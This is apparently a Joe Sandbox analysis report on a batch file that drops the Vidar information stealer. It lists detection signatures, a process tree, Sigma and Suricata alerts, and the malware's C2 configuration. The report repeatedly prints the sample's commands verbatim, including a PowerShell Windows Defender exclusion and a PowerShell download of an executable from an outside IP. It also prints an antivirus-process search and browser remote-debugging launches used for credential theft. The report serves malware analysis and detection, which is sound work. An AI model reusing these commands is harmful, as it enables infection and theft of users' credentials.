Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
skript.bat

Overview

General Information

Sample name:skript.bat
Analysis ID:1581178
MD5:0e57d68f00781ca58e94c012b16f9f5e
SHA1:6343fe57d26c64e02e1b9d5df7fe106c77946d59
SHA256:d5f7403aaf2fb3c03a0f60e0f9834504c81bbb5633d8eadfe5854b1cc28c84c8
Tags:batVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6716 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WmiPrvSE.exe (PID: 3060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • timeout.exe (PID: 7232 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • powershell.exe (PID: 7456 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • putt.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\putt.exe" MD5: 5782BEA403267E4A6DDF82263332ED59)
      • cmd.exe (PID: 8008 cmdline: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8112 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 8120 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 8160 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 8168 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 6532 cmdline: cmd /c md 105235 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 6500 cmdline: extrac32 /Y /E Authorization MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 1596 cmdline: findstr /V "aid" Division MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 776 cmdline: cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 5172 cmdline: cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Inf.com (PID: 6636 cmdline: Inf.com m MD5: 62D09F076E6E0240548C2F837536A46A)
          • chrome.exe (PID: 5332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 7472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • msedge.exe (PID: 7360 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 3432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
        • choice.exe (PID: 508 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 6432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 3880 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 1828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 5344 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 7528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 7512 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
skript.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                Click to see the 7 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                26.2.Inf.com.41e0000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  26.2.Inf.com.41e0000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                  • 0x2068c:$str01: MachineID:
                  • 0x1f051:$str02: Work Dir: In memory
                  • 0x206c3:$str03: [Hardware]
                  • 0x20675:$str04: VideoCard:
                  • 0x1fce5:$str05: [Processes]
                  • 0x1fcf1:$str06: [Software]
                  • 0x1f1bb:$str07: information.txt
                  • 0x20398:$str08: %s\*
                  • 0x203e5:$str08: %s\*
                  • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                  • 0x1fb61:$str12: UseMasterPassword
                  • 0x206cf:$str13: Soft: WinSCP
                  • 0x2016e:$str14: <Pass encoding="base64">
                  • 0x206b2:$str15: Soft: FileZilla
                  • 0x1f1ad:$str16: passwords.txt
                  • 0x1fb8c:$str17: build_id
                  • 0x1fc80:$str18: file_data

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_7456.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: PowerShell DownloadFile
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: Browser Started with Remote Debugging
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Inf.com m, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, ParentProcessId: 6636, ParentProcessName: Inf.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5332, ProcessName: chrome.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: PowerShell Download Pattern
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')", ProcessId: 7456, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2448, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd", ProcessId: 6716, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7856, ProcessName: svchost.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8008, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 8168, ProcessName: findstr.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T07:09:31.597895+010020197142Potentially Bad Traffic192.168.2.6497735.252.155.6480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T07:10:44.485231+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.649939TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T07:10:46.979430+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.649945TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T07:10:42.007109+010020490871A Network Trojan was detected192.168.2.649933188.245.216.205443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-27T07:10:39.619043+010028593781Malware Command and Control Activity Detected192.168.2.649927188.245.216.205443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://5.252.155.64/lem.exe#Avira URL Cloud: Label: malware
                    Source: http://5.252.155.64/lem.exeAvira URL Cloud: Label: malware
                    Source: https://bijutr.shop/opAvira URL Cloud: Label: malware
                    Source: https://bijutr.shop/TEAvira URL Cloud: Label: malware
                    Source: https://bijutr.shop/h$Avira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49712 version: TLS 1.2
